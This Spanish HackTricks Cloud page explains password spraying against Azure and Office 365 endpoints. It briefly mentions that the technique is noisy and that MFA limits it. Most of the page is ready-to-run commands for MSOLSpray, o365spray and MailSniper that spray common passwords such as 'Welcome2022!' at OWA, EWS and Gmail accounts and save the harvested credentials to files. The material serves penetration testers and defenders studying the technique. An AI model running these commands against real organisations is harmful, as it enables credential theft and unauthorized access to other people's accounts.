Español - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Password Spraying

Aprende a hackear AWS desde cero hasta convertirte en un experto con htARTE (Experto en Red de HackTricks AWS)!

Otras formas de apoyar a HackTricks:

Ataque de Rociado de Contraseñas

En Azure esto se puede hacer contra diferentes puntos finales de API como Azure AD Graph, Microsoft Graph, el servicio web de informes de Office 365, etc.

Sin embargo, ten en cuenta que esta técnica es muy ruidosa y el Equipo Azul puede detectarla fácilmente. Además, la complejidad forzada de la contraseña y el uso de MFA pueden hacer que esta técnica sea un poco inútil.

Puedes realizar un ataque de rociado de contraseñas con MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

O con o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

O con MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

AnteriorAz - Device Code Authentication PhishingSiguienteAz - Services

Última actualización